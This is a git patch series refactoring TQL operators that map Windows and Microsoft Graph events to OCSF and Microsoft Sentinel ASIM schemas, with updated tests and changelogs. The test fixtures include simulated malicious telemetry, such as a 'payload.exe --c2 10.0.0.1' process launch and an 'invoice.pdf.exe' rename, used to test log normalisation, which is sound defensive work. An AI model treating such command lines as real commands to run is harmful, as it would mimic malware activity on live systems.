diff --git a/microsoft/tests/ocsf-to-asim/direct-targets.txt b/microsoft/tests/ocsf-to-asim/direct-targets.txt index cf0e400..89b0c39 100644 --- a/microsoft/tests/ocsf-to-asim/direct-targets.txt +++ b/microsoft/tests/ocsf-to-asim/direct-targets.txt @@ -11,6 +11,8 @@ TargetFilePath: null, TargetFilePathType: null, TargetFileName: null, + SrcFilePath: null, + SrcFileName: null, SrcIpAddr: 10.0.0.50, SrcPortNumber: null, DstIpAddr: null, @@ -39,6 +41,8 @@ TargetFilePath: null, TargetFilePathType: null, TargetFileName: null, + SrcFilePath: null, + SrcFileName: null, SrcIpAddr: 10.0.0.1, SrcPortNumber: null, DstIpAddr: null, @@ -67,6 +71,38 @@ TargetFilePath: "C:\\tmp\\payload.exe", TargetFilePathType: "Windows Local", TargetFileName: "payload.exe", + SrcFilePath: null, + SrcFileName: null, + SrcIpAddr: null, + SrcPortNumber: null, + DstIpAddr: null, + DstPortNumber: null, + SrcBytes: null, + DstBytes: null, + DnsQuery: null, + DnsQueryTypeName: null, + DnsQueryClassName: null, + EventResultDetails: null, + SrcHostname: null, + SrcMacAddr: null, + Url: null, + HttpRequestMethod: null, +} +{ + name: "asim.file_event", + EventSchema: "FileEvent", + EventSchemaVersion: "0.2.2", + EventType: "FileRenamed", + EventResult: "Success", + EventSeverity: "Informational", + EventOriginalUid: "file-2", + Dvc: "host1", + ActorUsername: "alice", + TargetFilePath: "C:\\tmp\\invoice.pdf.exe", + TargetFilePathType: "Windows Local", + TargetFileName: "invoice.pdf.exe", + SrcFilePath: "C:\\tmp\\payload.exe", + SrcFileName: "payload.exe", SrcIpAddr: null, SrcPortNumber: null, DstIpAddr: null, @@ -95,6 +131,8 @@ TargetFilePath: null, TargetFilePathType: null, TargetFileName: null, + SrcFilePath: null, + SrcFileName: null, SrcIpAddr: 10.0.0.1, SrcPortNumber: 12345, DstIpAddr: 10.0.0.2, @@ -123,6 +161,8 @@ TargetFilePath: null, TargetFilePathType: null, TargetFileName: null, + SrcFilePath: null, + SrcFileName: null, SrcIpAddr: null, SrcPortNumber: null, DstIpAddr: null, diff --git a/microsoft/tests/ocsf-to-asim/process.tql b/microsoft/tests/ocsf-to-asim/process.tql index a70ec48..db7a522 100644 --- a/microsoft/tests/ocsf-to-asim/process.tql +++ b/microsoft/tests/ocsf-to-asim/process.tql @@ -26,6 +26,14 @@ from { hostname: "WINHOST01.corp.local", }, actor: { + process: { + pid: 4660, + name: "wscript.exe", + parent_process: { + pid: 520, + name: "explorer.exe", + }, + }, session: { uid_alt: "0xA1B2C3", }, diff --git a/microsoft/tests/ocsf-to-asim/process.txt b/microsoft/tests/ocsf-to-asim/process.txt index 299bbb6..ffe7db0 100644 --- a/microsoft/tests/ocsf-to-asim/process.txt +++ b/microsoft/tests/ocsf-to-asim/process.txt @@ -12,7 +12,7 @@ ActorUserId: "S-1-5-21-3107921522-2185401913-891411500-1104", ActorUserIdType: "SID", ActingProcessId: "4660", - ParentProcessId: "4660", + ParentProcessId: "520", TargetProcessId: "6732", TargetProcessName: "payload.exe", TargetProcessCommandLine: "payload.exe --c2 10.0.0.1", From e47c55796036eb16e3fe76741b89ecdb877db7ef Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Mon, 8 Jun 2026 08:14:52 +0200 Subject: [PATCH 03/27] Add canonical Microsoft mapping entry points Expose microsoft::ocsf::map and microsoft::asim::map as the broad package entry points. Split the OCSF-to-ASIM implementation into class-level mappers under microsoft::asim::ocsf so future direct ASIM mappings can be added behind the stable API. Assisted-by: GPT-5 (Codex) --- ...ell-audit-log-cleared-and-iam-lifecycle.md | 2 +- ...crosoft-graph-sources-and-ocsf-mappings.md | 2 +- .../unreleased/ocsf-to-asim-mapper.md | 6 +- .../windows-authorize-session-ocsf-mapping.md | 2 +- .../graph-defender-alerts-to-ocsf.tql | 2 +- .../graph-defender-incidents-to-ocsf.tql | 2 +- .../graph-directory-audits-to-ocsf.tql | 2 +- .../graph-intune-compliance-to-ocsf.tql | 2 +- .../graph-intune-detected-apps-to-ocsf.tql | 2 +- .../graph-intune-managed-devices-to-ocsf.tql | 2 +- .../graph-risk-detections-to-ocsf.tql | 2 +- .../examples/graph-risky-users-to-ocsf.tql | 2 +- microsoft/examples/graph-sign-ins-to-ocsf.tql | 2 +- microsoft/operators/asim/map.tql | 22 ++ .../operators/asim/ocsf/account_change.tql | 46 +++ .../operators/asim/ocsf/authentication.tql | 58 +++ .../operators/asim/ocsf/authorize_session.tql | 55 +++ .../asim/ocsf/compliance_finding.tql | 41 +++ .../operators/asim/ocsf/detection_finding.tql | 56 +++ .../operators/asim/ocsf/dhcp_activity.tql | 22 ++ .../operators/asim/ocsf/dns_activity.tql | 26 ++ .../operators/asim/ocsf/entity_management.tql | 40 ++ .../asim/ocsf/event_log_activity.tql | 40 ++ .../asim/ocsf/file_system_activity.tql | 37 ++ .../operators/asim/ocsf/group_management.tql | 42 +++ .../asim => asim/ocsf/helpers}/common.tql | 0 .../operators/asim/ocsf/helpers/finalize.tql | 7 + .../ocsf/helpers}/unsupported.tql | 2 +- .../operators/asim/ocsf/http_activity.tql | 19 + microsoft/operators/asim/ocsf/map.tql | 57 +++ .../operators/asim/ocsf/network_activity.tql | 33 ++ .../operators/asim/ocsf/process_activity.tql | 31 ++ .../asim/ocsf/scheduled_job_activity.tql | 40 ++ .../asim/ocsf/windows_service_activity.tql | 40 ++ microsoft/operators/ocsf/map.tql | 15 + microsoft/operators/ocsf/map_to_asim.tql | 344 ------------------ microsoft/package.yaml | 4 +- microsoft/tests/asim/graph.tql | 11 + microsoft/tests/asim/graph.txt | 16 + microsoft/tests/asim/ocsf.tql | 39 ++ microsoft/tests/asim/ocsf.txt | 18 + microsoft/tests/asim/windows.tql | 10 + microsoft/tests/asim/windows.txt | 19 + ...pliance-policy-setting-state-summaries.tql | 2 +- .../tests/graph/ocsf/defender-alerts.tql | 2 +- .../tests/graph/ocsf/defender-incidents.tql | 2 +- microsoft/tests/graph/ocsf/detected-apps.tql | 2 +- .../tests/graph/ocsf/directory-audits.tql | 2 +- .../tests/graph/ocsf/managed-devices.tql | 2 +- .../tests/graph/ocsf/risk-detections.tql | 2 +- microsoft/tests/graph/ocsf/risky-users.tql | 2 +- microsoft/tests/graph/ocsf/sign-ins.tql | 2 +- microsoft/tests/ocsf-to-asim/alert.tql | 2 +- microsoft/tests/ocsf-to-asim/audit.tql | 2 +- .../tests/ocsf-to-asim/authentication.tql | 2 +- .../tests/ocsf-to-asim/direct-targets.tql | 2 +- microsoft/tests/ocsf-to-asim/process.tql | 2 +- .../tests/ocsf-to-asim/unsupported-strict.tql | 2 +- .../tests/ocsf-to-asim/user-management.tql | 2 +- microsoft/tests/ocsf/eid-0100.tql | 2 +- microsoft/tests/ocsf/eid-0101.tql | 2 +- microsoft/tests/ocsf/eid-0102.tql | 2 +- microsoft/tests/ocsf/eid-0106.tql | 2 +- microsoft/tests/ocsf/eid-0129.tql | 2 +- microsoft/tests/ocsf/eid-0140.tql | 2 +- microsoft/tests/ocsf/eid-0141.tql | 2 +- microsoft/tests/ocsf/eid-0200.tql | 2 +- microsoft/tests/ocsf/eid-0201.tql | 2 +- microsoft/tests/ocsf/eid-1000.tql | 2 +- microsoft/tests/ocsf/eid-1001.tql | 2 +- microsoft/tests/ocsf/eid-1002.tql | 2 +- microsoft/tests/ocsf/eid-1006.tql | 2 +- microsoft/tests/ocsf/eid-1007.tql | 2 +- microsoft/tests/ocsf/eid-1102.tql | 2 +- microsoft/tests/ocsf/eid-1116.tql | 2 +- microsoft/tests/ocsf/eid-1117.tql | 2 +- microsoft/tests/ocsf/eid-1121.tql | 2 +- microsoft/tests/ocsf/eid-2000.tql | 2 +- microsoft/tests/ocsf/eid-4100.tql | 2 +- microsoft/tests/ocsf/eid-4103.tql | 2 +- microsoft/tests/ocsf/eid-4104.tql | 2 +- microsoft/tests/ocsf/eid-4105.tql | 2 +- microsoft/tests/ocsf/eid-4106.tql | 2 +- microsoft/tests/ocsf/eid-4624.tql | 2 +- microsoft/tests/ocsf/eid-4625.tql | 2 +- microsoft/tests/ocsf/eid-4648.tql | 2 +- microsoft/tests/ocsf/eid-4672.tql | 2 +- microsoft/tests/ocsf/eid-4688.tql | 2 +- microsoft/tests/ocsf/eid-4697.tql | 2 +- microsoft/tests/ocsf/eid-4698.tql | 2 +- microsoft/tests/ocsf/eid-4720.tql | 2 +- microsoft/tests/ocsf/eid-4722.tql | 2 +- microsoft/tests/ocsf/eid-4725.tql | 2 +- microsoft/tests/ocsf/eid-4726.tql | 2 +- microsoft/tests/ocsf/eid-4728.tql | 2 +- microsoft/tests/ocsf/eid-4730.tql | 2 +- microsoft/tests/ocsf/eid-4732.tql | 2 +- microsoft/tests/ocsf/eid-4769.tql | 2 +- microsoft/tests/ocsf/eid-4771.tql | 2 +- microsoft/tests/ocsf/eid-4776.tql | 2 +- microsoft/tests/ocsf/eid-5001.tql | 2 +- microsoft/tests/ocsf/eid-5007.tql | 2 +- microsoft/tests/ocsf/eid-6005.tql | 2 +- microsoft/tests/ocsf/eid-6006.tql | 2 +- microsoft/tests/ocsf/eid-7034.tql | 2 +- microsoft/tests/ocsf/eid-7045.tql | 2 +- microsoft/tests/ocsf/eid-9999.tql | 2 +- 107 files changed, 923 insertions(+), 425 deletions(-) create mode 100644 microsoft/operators/asim/map.tql create mode 100644 microsoft/operators/asim/ocsf/account_change.tql create mode 100644 microsoft/operators/asim/ocsf/authentication.tql create mode 100644 microsoft/operators/asim/ocsf/authorize_session.tql create mode 100644 microsoft/operators/asim/ocsf/compliance_finding.tql create mode 100644 microsoft/operators/asim/ocsf/detection_finding.tql create mode 100644 microsoft/operators/asim/ocsf/dhcp_activity.tql create mode 100644 microsoft/operators/asim/ocsf/dns_activity.tql create mode 100644 microsoft/operators/asim/ocsf/entity_management.tql create mode 100644 microsoft/operators/asim/ocsf/event_log_activity.tql create mode 100644 microsoft/operators/asim/ocsf/file_system_activity.tql create mode 100644 microsoft/operators/asim/ocsf/group_management.tql rename microsoft/operators/{ocsf/asim => asim/ocsf/helpers}/common.tql (100%) create mode 100644 microsoft/operators/asim/ocsf/helpers/finalize.tql rename microsoft/operators/{ocsf/asim => asim/ocsf/helpers}/unsupported.tql (73%) create mode 100644 microsoft/operators/asim/ocsf/http_activity.tql create mode 100644 microsoft/operators/asim/ocsf/map.tql create mode 100644 microsoft/operators/asim/ocsf/network_activity.tql create mode 100644 microsoft/operators/asim/ocsf/process_activity.tql create mode 100644 microsoft/operators/asim/ocsf/scheduled_job_activity.tql create mode 100644 microsoft/operators/asim/ocsf/windows_service_activity.tql create mode 100644 microsoft/operators/ocsf/map.tql delete mode 100644 microsoft/operators/ocsf/map_to_asim.tql create mode 100644 microsoft/tests/asim/graph.tql create mode 100644 microsoft/tests/asim/graph.txt create mode 100644 microsoft/tests/asim/ocsf.tql create mode 100644 microsoft/tests/asim/ocsf.txt create mode 100644 microsoft/tests/asim/windows.tql create mode 100644 microsoft/tests/asim/windows.txt diff --git a/microsoft/changelog/unreleased/expanded-windows-event-log-ocsf-mapping-powershell-audit-log-cleared-and-iam-lifecycle.md b/microsoft/changelog/unreleased/expanded-windows-event-log-ocsf-mapping-powershell-audit-log-cleared-and-iam-lifecycle.md index c7a339b..ddcecf9 100644 --- a/microsoft/changelog/unreleased/expanded-windows-event-log-ocsf-mapping-powershell-audit-log-cleared-and-iam-lifecycle.md +++ b/microsoft/changelog/unreleased/expanded-windows-event-log-ocsf-mapping-powershell-audit-log-cleared-and-iam-lifecycle.md @@ -11,7 +11,7 @@ prs: created: 2026-03-24T13:37:04.933237Z --- -The `microsoft::windows::ocsf::map` operator now covers five additional Windows Event Log categories: +The `microsoft::ocsf::map` operator now covers five additional Windows Event Log categories: **PowerShell logging** (EIDs 4100/4103/4104/4105/4106) maps to OCSF Script Activity (1009). EID 4104 (Script Block Logging) sets `severity_id` to Low when AMSI flags the block; EID 4100 (engine error) marks the execution as a failure. diff --git a/microsoft/changelog/unreleased/microsoft-graph-sources-and-ocsf-mappings.md b/microsoft/changelog/unreleased/microsoft-graph-sources-and-ocsf-mappings.md index efb2294..4ccc175 100644 --- a/microsoft/changelog/unreleased/microsoft-graph-sources-and-ocsf-mappings.md +++ b/microsoft/changelog/unreleased/microsoft-graph-sources-and-ocsf-mappings.md @@ -12,7 +12,7 @@ created: 2026-05-27T09:17:24Z The Microsoft package can now collect and normalize common Microsoft Graph security and inventory data. -Use the Graph source operators and `microsoft::graph::ocsf::map` for Entra ID +Use the Graph source operators and `microsoft::ocsf::map` for Entra ID sign-ins, directory audits, Defender alerts and incidents, Identity Protection risk data, and Intune inventory and compliance data. diff --git a/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md b/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md index 8655ed3..f0b462d 100644 --- a/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md +++ b/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md @@ -7,8 +7,10 @@ authors: created: 2026-06-07T00:00:00Z --- -The Microsoft package now includes `microsoft::ocsf::map_to_asim` to convert -validated OCSF 1.8 events into flat Microsoft Sentinel ASIM event records. +The Microsoft package now includes `microsoft::asim::map` to convert supported +Microsoft events into flat Microsoft Sentinel ASIM event records. The mapper +uses the new `microsoft::ocsf::map` entry point and `microsoft::asim::ocsf::map` +for validated OCSF 1.8 events. The mapper covers the Microsoft package's current OCSF authentication, process, audit, user-management, and alert outputs, plus direct OCSF counterparts for diff --git a/microsoft/changelog/unreleased/windows-authorize-session-ocsf-mapping.md b/microsoft/changelog/unreleased/windows-authorize-session-ocsf-mapping.md index 930d623..ee209f3 100644 --- a/microsoft/changelog/unreleased/windows-authorize-session-ocsf-mapping.md +++ b/microsoft/changelog/unreleased/windows-authorize-session-ocsf-mapping.md @@ -9,4 +9,4 @@ prs: created: 2026-06-02T08:30:07.026165Z --- -The `microsoft::windows::ocsf::map` operator now maps Windows Security Event ID 4672, "Special privileges assigned to new logon", to OCSF Authorize Session (3003) with the Assign Privileges activity. +The `microsoft::ocsf::map` operator now maps Windows Security Event ID 4672, "Special privileges assigned to new logon", to OCSF Authorize Session (3003) with the Assign Privileges activity. diff --git a/microsoft/examples/graph-defender-alerts-to-ocsf.tql b/microsoft/examples/graph-defender-alerts-to-ocsf.tql index 11adff0..ae2bd8f 100644 --- a/microsoft/examples/graph-defender-alerts-to-ocsf.tql +++ b/microsoft/examples/graph-defender-alerts-to-ocsf.tql @@ -8,6 +8,6 @@ microsoft::graph::defender::alerts \ client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET"), lookback=5m -microsoft::graph::ocsf::map +microsoft::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/examples/graph-defender-incidents-to-ocsf.tql b/microsoft/examples/graph-defender-incidents-to-ocsf.tql index 08943f3..862f44c 100644 --- a/microsoft/examples/graph-defender-incidents-to-ocsf.tql +++ b/microsoft/examples/graph-defender-incidents-to-ocsf.tql @@ -9,7 +9,7 @@ every 5m { client_secret=secret("CLIENT_SECRET"), lookback=5m } -microsoft::graph::ocsf::map +microsoft::ocsf::map ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-directory-audits-to-ocsf.tql b/microsoft/examples/graph-directory-audits-to-ocsf.tql index 6f36800..cf3498e 100644 --- a/microsoft/examples/graph-directory-audits-to-ocsf.tql +++ b/microsoft/examples/graph-directory-audits-to-ocsf.tql @@ -9,7 +9,7 @@ every 5m { client_secret=secret("CLIENT_SECRET"), lookback=5m } -microsoft::graph::ocsf::map +microsoft::ocsf::map ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-intune-compliance-to-ocsf.tql b/microsoft/examples/graph-intune-compliance-to-ocsf.tql index 37c2309..de4b6b2 100644 --- a/microsoft/examples/graph-intune-compliance-to-ocsf.tql +++ b/microsoft/examples/graph-intune-compliance-to-ocsf.tql @@ -8,7 +8,7 @@ every 5m { client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET") } -microsoft::graph::ocsf::map +microsoft::ocsf::map ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql b/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql index e02193d..3277563 100644 --- a/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql +++ b/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql @@ -8,7 +8,7 @@ every 5m { client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET") } -microsoft::graph::ocsf::map +microsoft::ocsf::map ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql b/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql index 4896624..4e0ef7f 100644 --- a/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql +++ b/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql @@ -7,6 +7,6 @@ microsoft::graph::intune::managed_devices \ tenant_id="TENANT_ID", client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET") -microsoft::graph::ocsf::map +microsoft::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/examples/graph-risk-detections-to-ocsf.tql b/microsoft/examples/graph-risk-detections-to-ocsf.tql index 4a22971..5b59ea1 100644 --- a/microsoft/examples/graph-risk-detections-to-ocsf.tql +++ b/microsoft/examples/graph-risk-detections-to-ocsf.tql @@ -8,7 +8,7 @@ every 5m { client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET") } -microsoft::graph::ocsf::map +microsoft::ocsf::map ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-risky-users-to-ocsf.tql b/microsoft/examples/graph-risky-users-to-ocsf.tql index 09325d0..1c37ffd 100644 --- a/microsoft/examples/graph-risky-users-to-ocsf.tql +++ b/microsoft/examples/graph-risky-users-to-ocsf.tql @@ -8,7 +8,7 @@ every 5m { client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET") } -microsoft::graph::ocsf::map +microsoft::ocsf::map ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-sign-ins-to-ocsf.tql b/microsoft/examples/graph-sign-ins-to-ocsf.tql index a751311..7a1031a 100644 --- a/microsoft/examples/graph-sign-ins-to-ocsf.tql +++ b/microsoft/examples/graph-sign-ins-to-ocsf.tql @@ -8,6 +8,6 @@ microsoft::graph::sign_ins \ client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET"), lookback=5m -microsoft::graph::ocsf::map +microsoft::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/operators/asim/map.tql b/microsoft/operators/asim/map.tql new file mode 100644 index 0000000..93204fc --- /dev/null +++ b/microsoft/operators/asim/map.tql @@ -0,0 +1,22 @@ +--- +description: Microsoft event -> Microsoft Sentinel ASIM event. +args: + positional: + - name: log + description: The field that holds a raw Microsoft event, such as Windows Event Log XML. + default: null +--- + +if class_uid? != null { + microsoft::asim::ocsf::map +} else { + if $log != null { + _microsoft_asim_log = $log + microsoft::ocsf::map _microsoft_asim_log + } else { + microsoft::ocsf::map + } + ocsf::derive + ocsf::cast + microsoft::asim::ocsf::map +} diff --git a/microsoft/operators/asim/ocsf/account_change.tql b/microsoft/operators/asim/ocsf/account_change.tql new file mode 100644 index 0000000..2d88067 --- /dev/null +++ b/microsoft/operators/asim/ocsf/account_change.tql @@ -0,0 +1,46 @@ +--- +description: OCSF Account Change event -> Microsoft Sentinel ASIM UserManagement event. +--- + +microsoft::asim::ocsf::helpers::common + +@name = "asim.user_management" +asim.EventSchema = "UserManagement" +asim.EventSchemaVersion = "0.1.2" +asim.EventSeverity = asim.EventSeverity? else "Informational" +asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? else actor?.app_name? else actor?.app_uid? +if actor?.user?.domain? != null and actor?.user?.name? != null { + asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" + asim.ActorUsernameType = "Windows" +} +assert asim.ActorUsername != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} +asim.ActorUserId = actor?.user?.uid? +asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null + +match activity_name { + "Create" => { asim.EventType = "UserCreated" } + "Delete" => { asim.EventType = "UserDeleted" } + "Update" => { asim.EventType = "UserModified" } + "Lock" => { asim.EventType = "UserLocked" } + "Unlock" => { asim.EventType = "UserUnlocked" } + "Disable" => { asim.EventType = "UserDisabled" } + "Enable" => { asim.EventType = "UserEnabled" } + "Password Change" => { asim.EventType = "PasswordChanged" } + "Password Reset" => { asim.EventType = "PasswordReset" } + _ => { asim.EventType = "UserModified" } +} + +asim.TargetUsername = user?.email_addr? else user?.name? else user?.uid? +if user?.domain? != null and user?.name? != null { + asim.TargetUsername = f"{user.domain}\\{user.name}" + asim.TargetUsernameType = "Windows" +} +asim.TargetUserId = user?.uid? +asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null +asim.GroupName = group?.name? +asim.GroupId = group?.uid? +asim.GroupIdType = "SID" if (asim.GroupId?.starts_with("S-") else false) else null +asim.SrcIpAddr = src_endpoint?.ip? +asim.SrcHostname = src_endpoint?.hostname? + +microsoft::asim::ocsf::helpers::finalize diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql new file mode 100644 index 0000000..f0b9d16 --- /dev/null +++ b/microsoft/operators/asim/ocsf/authentication.tql @@ -0,0 +1,58 @@ +--- +description: OCSF Authentication event -> Microsoft Sentinel ASIM Authentication event. +--- + +microsoft::asim::ocsf::helpers::common + +@name = "asim.authentication" +asim.EventSchema = "Authentication" +asim.EventSchemaVersion = "0.1.4" +match activity_name { + "Logoff" => { asim.EventType = "Logoff" } + _ => { asim.EventType = "Logon" } +} +match logon_type? { + "System" => { asim.EventSubType = "System" } + "Interactive" | "Cached Interactive" | "Unlock" | "Cached Unlock" => { + asim.EventSubType = "Interactive" + } + "Network" | "Network Cleartext" => { asim.EventSubType = "Remote" } + "Remote Interactive" | "Cached Remote Interactive" => { + asim.EventSubType = "RemoteInteractive" + } + "OS Service" => { asim.EventSubType = "Service" } + _ => {} +} +if logon_type? != null { + asim.EventOriginalSubType = logon_type +} +asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? +if actor?.user?.domain? != null and actor?.user?.name? != null { + asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" + asim.ActorUsernameType = "Windows" +} +asim.ActorUserId = actor?.user?.uid? +asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null +asim.ActorSessionId = actor?.session?.uid? else actor?.session?.uid_alt? +asim.TargetUsername = user?.email_addr? else user?.name? else user?.uid? +if user?.domain? != null and user?.name? != null { + asim.TargetUsername = f"{user.domain}\\{user.name}" + asim.TargetUsernameType = "Windows" + asim.TargetDomain = user.domain + asim.TargetDomainType = "Windows" +} +asim.TargetUserId = user?.uid? +asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null +asim.TargetSessionId = session?.uid? else session?.uid_alt? +asim.SrcIpAddr = src_endpoint?.ip? +asim.SrcHostname = src_endpoint?.hostname? +asim.SrcPortNumber = src_endpoint?.port? +asim.TargetHostname = dst_endpoint?.hostname? else device?.hostname? +asim.TargetAppId = service?.uid? else dst_endpoint?.uid? +asim.TargetAppName = service?.name? else dst_endpoint?.svc_name? +asim.LogonProtocol = auth_protocol? +if auth_factors? != null { + asim.LogonMethod = auth_factors[0]?.factor_type? +} + +microsoft::asim::ocsf::helpers::finalize diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql new file mode 100644 index 0000000..00af6c7 --- /dev/null +++ b/microsoft/operators/asim/ocsf/authorize_session.tql @@ -0,0 +1,55 @@ +--- +description: OCSF Authorize Session event -> Microsoft Sentinel ASIM Authentication event. +--- + +microsoft::asim::ocsf::helpers::common + +@name = "asim.authentication" +asim.EventSchema = "Authentication" +asim.EventSchemaVersion = "0.1.4" +asim.EventType = "Elevate" +match logon_type? { + "System" => { asim.EventSubType = "System" } + "Interactive" | "Cached Interactive" | "Unlock" | "Cached Unlock" => { + asim.EventSubType = "Interactive" + } + "Network" | "Network Cleartext" => { asim.EventSubType = "Remote" } + "Remote Interactive" | "Cached Remote Interactive" => { + asim.EventSubType = "RemoteInteractive" + } + "OS Service" => { asim.EventSubType = "Service" } + _ => {} +} +if logon_type? != null { + asim.EventOriginalSubType = logon_type +} +asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid? +if actor?.user?.domain? != null and actor?.user?.name? != null { + asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}" + asim.ActorUsernameType = "Windows" +} +asim.ActorUserId = actor?.user?.uid? +asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null +asim.ActorSessionId = actor?.session?.uid? else actor?.session?.uid_alt? +asim.TargetUsername = user?.email_addr? else user?.name? else user?.uid? +if user?.domain? != null and user?.name? != null { + asim.TargetUsername = f"{user.domain}\\{user.name}" + asim.TargetUsernameType = "Windows" + asim.TargetDomain = user.domain + asim.TargetDomainType = "Windows" +} +asim.TargetUserId = user?.uid? +asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null +asim.TargetSessionId = session?.uid? else session?.uid_alt? +asim.SrcIpAddr = src_endpoint?.ip? +asim.SrcHostname = src_endpoint?.hostname? +asim.SrcPortNumber = src_endpoint?.port? +asim.TargetHostname = dst_endpoint?.hostname? else device?.hostname? +asim.TargetAppId = service?.uid? else dst_endpoint?.uid? +asim.TargetAppName = service?.name? else dst_endpoint?.svc_name? +asim.LogonProtocol = auth_protocol? +if auth_factors? != null { + asim.LogonMethod = auth_factors[0]?.factor_type? +} + +microsoft::asim::ocsf::helpers::finalize diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql new file mode 100644 index 0000000..035f6c8 --- /dev/null +++ b/microsoft/operators/asim/ocsf/compliance_finding.tql @@ -0,0 +1,41 @@ +--- +description: OCSF Compliance Finding event -> Microsoft Sentinel ASIM AlertEvent. +--- + +microsoft::asim::ocsf::helpers::common + +@name = "asim.alert_event" +asim.EventSchema = "AlertEvent" +asim.EventSchemaVersion = "0.1" +asim.EventType = "Alert" +asim.EventUid = finding_info?.uid? else metadata?.original_event_uid? +assert asim.EventUid != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} + +asim.AlertName = finding_info?.title? else message? +asim.EventReportUrl = finding_info?.url? else null +asim.EventSubType = "Compliance Violation" +asim.ThreatName = malware?[0]?.name? else finding_info?.title? +asim.ThreatCategory = "Security Policy Violation" +asim.ThreatOriginalCategory = finding_info?.types?[0]? +asim.Username = user?.email_addr? else user?.name? else actor?.user?.email_addr? else actor?.user?.name? +asim.UserId = user?.uid? else actor?.user?.uid? +asim.UserIdType = "SID" if (asim.UserId?.starts_with("S-") else false) else null +match status? { + "New" | "Active" | "In Progress" => { + asim.AlertStatus = "Active" + } + "Resolved" | "Closed" => { + asim.AlertStatus = "Closed" + } + _ => {} +} +asim.AlertOriginalStatus = status? +match verdict? { + "True Positive" => { asim.AlertVerdict = "True Positive" } + "False Positive" => { asim.AlertVerdict = "False Positive" } + "Benign" => { asim.AlertVerdict = "Benign Positive" } + "Unknown" => { asim.AlertVerdict = "Unknown" } + _ => {} +} + +microsoft::asim::ocsf::helpers::finalize diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql new file mode 100644 index 0000000..cdc8b16 --- /dev/null +++ b/microsoft/operators/asim/ocsf/detection_finding.tql @@ -0,0 +1,56 @@ +--- +description: OCSF Detection Finding event -> Microsoft Sentinel ASIM AlertEvent. +--- + +let $threat_categories = { + adware: "Adware", + cryptominer: "Cryptominor", + malware: "Malware", + phishing: "Phishing", + ransomware: "Ransomware", + rootkit: "Rootkit", + spam: "Spam", + spoofing: "Spoofing", + spyware: "Spyware", + trojan: "Trojan", + virus: "Virus", + worm: "Worm", +} + +microsoft::asim::ocsf::helpers::common + +@name = "asim.alert_event" +asim.EventSchema = "AlertEvent" +asim.EventSchemaVersion = "0.1" +asim.EventType = "Alert" +asim.EventUid = finding_info?.uid? else metadata?.original_event_uid? +assert asim.EventUid != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name} + +asim.AlertName = finding_info?.title? else message? +asim.EventReportUrl = finding_info?.url? else null +asim.EventSubType = "Threat" +asim.ThreatName = malware?[0]?.name? else finding_info?.title? +asim.ThreatCategory = $threat_categories[finding_info?.types?[0]?.to_lower()]? +asim.ThreatOriginalCategory = finding_info?.types?[0]? +asim.Username = user?.email_addr? else user?.name? else actor?.user?.email_addr? else actor?.user?.name? +asim.UserId = user?.uid? else actor?.user?.uid? +asim.UserIdType = "SID" if (asim.UserId?.starts_with("S-") else false) else null +match status? { + "New" | "Active" | "In Progress" => { + asim.AlertStatus = "Active" + } + "Resolved" | "Closed" => { + asim.AlertStatus = "Closed" + } + _ => {} +} +asim.AlertOriginalStatus = status? +match verdict? { + "True Positive" => { asim.AlertVerdict = "True Positive" } + "False Positive" => { asim.AlertVerdict = "False Positive" } + "Benign" => { asim.AlertVerdict = "Benign Positive" } + "Unknown" => { asim.AlertVerdict = "Unknown" } + _ => {} +} + 